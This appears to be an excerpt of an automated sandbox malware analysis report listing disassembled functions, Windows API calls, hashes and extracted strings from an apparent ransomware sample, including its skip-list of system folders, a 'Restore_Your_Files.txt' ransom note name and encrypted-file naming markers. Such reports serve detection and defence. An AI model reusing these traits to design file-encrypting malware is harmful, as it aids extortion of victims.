                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Xfsopenstd::_
                                          • String ID:
                                          • API String ID: 2914972069-0
                                          • Opcode ID: 94952484d9c5e4803437c812c5f44262fa6a8d2b8810786e44f35776e5b2e0a1
                                          • Instruction ID: 6328b0f23cd3c581681863e1a114c34c7b0436f4aa903b9cb1a4e6608071dbef
                                          • Opcode Fuzzy Hash: 94952484d9c5e4803437c812c5f44262fa6a8d2b8810786e44f35776e5b2e0a1
                                          • Instruction Fuzzy Hash: C8113232A0723166CB25571CFF06B6A379B9F42750F0C8035FD09955A8EE3CDC028290
                                          Function 00A73B5D Relevance: 3.1, APIs: 2, Instructions: 67COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetStdHandle.KERNEL32(000000F6), ref: 00A73BA9
                                          • GetFileType.KERNEL32(00000000), ref: 00A73BBB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: FileHandleType
                                          • String ID:
                                          • API String ID: 3000768030-0
                                          • Opcode ID: a3ce6bec6cbc7cf6381abac66b0ea4433f0bdc09877ef5e000714958a3eb2b3a
                                          • Instruction ID: 50bb730191a6c4bc18a75f37d4ee32aff3d74738fbe6c2c329f9a75cf4e4c783
                                          • Opcode Fuzzy Hash: a3ce6bec6cbc7cf6381abac66b0ea4433f0bdc09877ef5e000714958a3eb2b3a
                                          • Instruction Fuzzy Hash: 23117B7360874146CF314B7D8C886227A649B96330F3AC71AD1BF965F1C734DA45B544
                                          Function 00A74AF6 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: __wsopen_s
                                          • String ID:
                                          • API String ID: 3347428461-0
                                          • Opcode ID: bf75cbca420a9a02f9c75ac581affc5e6fe8791466183badc92ff905033a4b8f
                                          • Instruction ID: e68211956c3770adf4e2e96c73ea599aab1729f2169d9a570a52ccd4db0d8373
                                          • Opcode Fuzzy Hash: bf75cbca420a9a02f9c75ac581affc5e6fe8791466183badc92ff905033a4b8f
                                          • Instruction Fuzzy Hash: 10114871A0410AAFCF05DF58E940E9A7BF9EF49300F0184AAF808AB311D730ED218BA4
                                          Function 00A74B7B Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: __wsopen_s
                                          • String ID:
                                          • API String ID: 3347428461-0
                                          • Opcode ID: 16f81336ff54dbf49749fba637e1f794eee834e48b030b179d76bbb9b64a5dd0
                                          • Instruction ID: 40225d34c7369d8ae3747f6d7b7ced1c478aab216563f7f15069eae95fffaa49
                                          • Opcode Fuzzy Hash: 16f81336ff54dbf49749fba637e1f794eee834e48b030b179d76bbb9b64a5dd0
                                          • Instruction Fuzzy Hash: 5C111871A0420AAFCB05DF58E941A9B7BF5EF48310F10849AF809AB352D771DD15CBA5
                                          Function 00A61D34 Relevance: 1.5, APIs: 1, Instructions: 46COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fdda3eeaaeb209e15c66a46a25a7ed506e6a5ebcfd1ec3d6670bf254339221b4
                                          • Instruction ID: b3fd853f89bdc8d1686fc4367b0765edc1c75ad65e027e90f36472f69eb7e95d
                                          • Opcode Fuzzy Hash: fdda3eeaaeb209e15c66a46a25a7ed506e6a5ebcfd1ec3d6670bf254339221b4
                                          • Instruction Fuzzy Hash: 13F02833901A109BDA313779CD05B6B3BB88F82334F188715F568931D1EB74D9018A96
                                          Function 00A8061F Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: e8e25b1a4a499fa9f27b732a0f05a36be17529d4bac13837c30e757c8c426e00
                                          • Instruction ID: 95fe3efe5d788c07165937108661232be56e99da5daca1c9d89006a9e1300022
                                          • Opcode Fuzzy Hash: e8e25b1a4a499fa9f27b732a0f05a36be17529d4bac13837c30e757c8c426e00
                                          • Instruction Fuzzy Hash: A1F0BE33410109BBDF11AE95DC01CEF3B6DEF89330F104122FA1892050EB72CA30A7A1
                                          Function 00A75B37 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00A75B94: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A57B27,?,?,?,?,?,009B1F07,?,?,?), ref: 00A75BC6
                                          • _free.LIBCMT ref: 00A75B57
                                            • Part of subcall function 00A74D66: HeapFree.KERNEL32(00000000,00000000,?,00A7D5F8,?,00000000,?,00000000,?,00A7D89C,?,00000007,?,?,00A7DC90,?), ref: 00A74D7C
                                            • Part of subcall function 00A74D66: GetLastError.KERNEL32(?,?,00A7D5F8,?,00000000,?,00000000,?,00A7D89C,?,00000007,?,?,00A7DC90,?,?), ref: 00A74D8E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Heap$AllocateErrorFreeLast_free
                                          • String ID:
                                          • API String ID: 314386986-0
                                          • Opcode ID: e64fe523d368cac0baeaa9ac56b5a8e24b923aa59dc71abe73b32fc8f424433e
                                          • Instruction ID: 1ddd20ea025b9d7d5efa8065922960fd09e171753538f1b93810cc274bff1a52
                                          • Opcode Fuzzy Hash: e64fe523d368cac0baeaa9ac56b5a8e24b923aa59dc71abe73b32fc8f424433e
                                          • Instruction Fuzzy Hash: 3DF049B2405B009FE3349F50D841B52B7F8EB44725F10C82EE29E8BA91DBB5B8448B94
                                          Function 00A75B94 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,00A57B27,?,?,?,?,?,009B1F07,?,?,?), ref: 00A75BC6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 0f292e8d4653340d3a7fea27559d249c55094e83bfaf8a9aacc8575c5f42ee9f
                                          • Instruction ID: 24faf9cf21068128f1a67aaca4fbf390f34ee0d99b60621ece17f280b217591f
                                          • Opcode Fuzzy Hash: 0f292e8d4653340d3a7fea27559d249c55094e83bfaf8a9aacc8575c5f42ee9f
                                          • Instruction Fuzzy Hash: 9EE02B31E05B6457DA212B765C00F7B76589FC13B0F20C121AC1D9A1C0FBE1DC0189F0
                                          Function 00A4089A Relevance: 1.5, APIs: 1, Instructions: 29COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A41B69
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID:
                                          • API String ID: 2005118841-0
                                          • Opcode ID: 0fb0e72e1c552be02ed7dce4af45881d97a6b8193cd2f50071f95922015edfdc
                                          • Instruction ID: 93a56a5761be8e8192d27a695b984fc45dd547f5e173df631e25c0353aa2aa3f
                                          • Opcode Fuzzy Hash: 0fb0e72e1c552be02ed7dce4af45881d97a6b8193cd2f50071f95922015edfdc
                                          • Instruction Fuzzy Hash: 73E0D13840430D76CF047BB4EE16D6D377C9950364B104570BD24654F2EF70E556D5D1
                                          Function 00A8035E Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,00000000,?,00A80739,?,?,00000000,?,00A80739,00000000,0000000C), ref: 00A8037B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 7f70ffeedd48736244045ab71037f2791655348059ea174cf765a24282cd39ca
                                          • Instruction ID: 1619f100c40c5f1443fc0a88a5dda450c374ddcc543ebef1b0adac27715cf588
                                          • Opcode Fuzzy Hash: 7f70ffeedd48736244045ab71037f2791655348059ea174cf765a24282cd39ca
                                          • Instruction Fuzzy Hash: 5CD06C3210024DFFDF028F84DC06EDA3BAAFB48714F018000BA1856020C732E922AB90

                                          Non-executed Functions

                                          Function 009CAF50 Relevance: 84.7, APIs: 7, Strings: 40, Instructions: 2469filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNEL32(00008003,21472377), ref: 009CAF9D
                                          • FindFirstFileW.KERNEL32(?,?,00AAFB88,00000002), ref: 009CAFC5
                                          • lstrcmpW.KERNEL32(?,00AAFEC0), ref: 009CC90E
                                          • lstrcmpW.KERNEL32(?,00AAFEC4), ref: 009CC924
                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 009CCC01
                                          • FindNextFileW.KERNEL32(?,?), ref: 009CD853
                                          • FindClose.KERNEL32(?), ref: 009CD867
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Find$Filelstrcmp$CloseErrorFirstIos_base_dtorModeNextstd::ios_base::_
                                          • String ID: .PBF$.bat$.cmd$.cpl$.dll$.exe$.icl$.ico$.ini$.lnk$.log$.msi$.scr$2$Dflt$Dflt$\Application Data\Microsoft\Credentials$\Boot$\Documents and Settings\$\Documents and Settings\All Users\Start Menu$\Local Settings\Application Data\Microsoft\Credentials$\Local Settings\Temporary Internet Files$\ProgramData$\ProgramData\Microsoft$\Recovery$\Restore_Your_Files.txt$\Start Menu$\System Volume Information$\Users\All Users\Microsoft\Windows\Caches$\Users\Default\ntuser.dat$\WINDOWS$\Windows$\skips.txt$_Eg$_Enc$_Mail-$_[ID-$user$w#G!$w#G!
                                          • API String ID: 830838206-1208110058
                                          • Opcode ID: 0a93111099549bb98b1077674905eafaa7c3d73e1d11767a5d3b5e1e8b8cd17f
                                          • Instruction ID: e078b5fcd049b4ad5dc9095f12191833ee28e8200b6ac7a0d0dde6a9a7f68afd
                                          • Opcode Fuzzy Hash: 0a93111099549bb98b1077674905eafaa7c3d73e1d11767a5d3b5e1e8b8cd17f
                                          • Instruction Fuzzy Hash: 5B3348B1E002298BDB24DF28CD85BDDB7B5AF44304F5081EDE609A7291DB349AC5CF99
                                          Function 009C8240 Relevance: 35.7, APIs: 2, Strings: 18, Instructions: 684COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: \Application Data\Microsoft\Credentials$\Boot$\Documents and Settings\$\Documents and Settings\All Users\Start Menu$\Local Settings\Application Data\Microsoft\Credentials$\Local Settings\Temporary Internet Files$\ProgramData$\ProgramData\Microsoft$\Recovery$\Start Menu$\System Volume Information$\Users\All Users\Microsoft\Windows\Caches$\WINDOWS$\Windows$\skips.txt$user$w#G!$w#G!
                                          • API String ID: 0-2777406613
                                          • Opcode ID: bc77907abc33c6da85e1b93fc77ff0502cdf710514c957a9144f0ccfe12e2770
                                          • Instruction ID: 08e6ab39fd6643f3726927cac9ad0616db5414d2c073f365f9f98996dbc4a3a8
                                          • Opcode Fuzzy Hash: bc77907abc33c6da85e1b93fc77ff0502cdf710514c957a9144f0ccfe12e2770
                                          • Instruction Fuzzy Hash: 8A624570E00659CFDF14DF68DC95BDEB7B1BB58305F1086A9D409A7290EB74AA88CF90
                                          Function 009C6AF7 Relevance: 25.6, APIs: 1, Strings: 13, Instructions: 1091COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 009B3740: __CxxThrowException@8.LIBVCRUNTIME ref: 009B376D
                                            • Part of subcall function 009B3740: __CxxThrowException@8.LIBVCRUNTIME ref: 009B37B2
                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 009C816A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw$Ios_base_dtorstd::ios_base::_
                                          • String ID: &4r*3d$($.PBF$INW15$_Mail-$_[ID-$vj10au=$vj20au=$vj30au=$vj51au=$vj55au=$vjau=$wenf=
                                          • API String ID: 2823994529-2029521403
                                          • Opcode ID: 8c06ab17368e0cf6570ae70cee37d5cb78aa60133232a7f0b939cf5cae974d17
                                          • Instruction ID: 6c281195085ba91d076a78fde27d0381fe6a39d6e56406c2ad9671fe3b9f88f6
                                          • Opcode Fuzzy Hash: 8c06ab17368e0cf6570ae70cee37d5cb78aa60133232a7f0b939cf5cae974d17
                                          • Instruction Fuzzy Hash: E3A2EF30E14258CFDB25CF68CC98BDEB7B2AF85304F10469CD049AB2A1DB75AA85CF51
                                          Function 009CE830 Relevance: 16.6, APIs: 5, Strings: 4, Instructions: 818networkCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 009B5130: CreateSemaphoreA.KERNEL32(00000000,00000000,7FFFFFFF,00000000), ref: 009B5198
                                            • Part of subcall function 009B5130: CreateSemaphoreA.KERNEL32(00000000,00000000,7FFFFFFF,00000000), ref: 009B51AC
                                            • Part of subcall function 009B5130: CreateSemaphoreA.KERNEL32(00000000,00000000,7FFFFFFF,00000000), ref: 009B51C0
                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 009CEEE0
                                          • PathIsNetworkPathA.SHLWAPI(00000000,?,00000002,-00000015,21472377,00000000), ref: 009CEF8B
                                          • PathIsNetworkPathA.SHLWAPI(00000000,?,00000002,-00000015,21472377,00000000), ref: 009CEFA1
                                          • PathIsNetworkPathA.SHLWAPI(00000000,?,00000002,-00000015,21472377,00000000), ref: 009CEFC0
                                          • PathIsNetworkPathA.SHLWAPI(00000000,?,00000002,-00000015,21472377,00000000), ref: 009CEFD7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Path$Network$CreateSemaphore$Ios_base_dtorstd::ios_base::_
                                          • String ID: X$\Restore_Your_Files.txt$w#G!$w#G!
                                          • API String ID: 3524565764-2814613863
                                          • Opcode ID: fef2e90adfd310f38be6006df9a10032ac0e2f3f14e4539930b334122e4171f1
                                          • Instruction ID: af55737962e184e586c93731b7f85e0450a23efbc468311311a0bb6d870153cb
                                          • Opcode Fuzzy Hash: fef2e90adfd310f38be6006df9a10032ac0e2f3f14e4539930b334122e4171f1
                                          • Instruction Fuzzy Hash: 0E72DE71E00298DBDF14DB68CD95BDDBBB5AF45300F1441ADE809A7292DB30AE85CF92
                                          Function 00A442D4 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00A45963: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00A45976
                                          • Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00A442E6
                                            • Part of subcall function 00A45A76: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00A45AA0
                                            • Part of subcall function 00A45A76: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00A45B0F
                                          • Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00A44418
                                          • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00A44478
                                          • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00A44484
                                          • Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 00A444BF
                                          • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00A444E0
                                          • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00A444EC
                                          • Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00A444F5
                                          • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 00A4450D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
                                          • String ID:
                                          • API String ID: 2508902052-0
                                          • Opcode ID: 6205ff1eeeaee0cf79450def734d6f74160819ef6e24cea2f90ec9e8164c7a4b
                                          • Instruction ID: a9c5ff9c2fc8a1f84c814160dc259c2afbb9c064780e57e830d71add0d637dd0
                                          • Opcode Fuzzy Hash: 6205ff1eeeaee0cf79450def734d6f74160819ef6e24cea2f90ec9e8164c7a4b
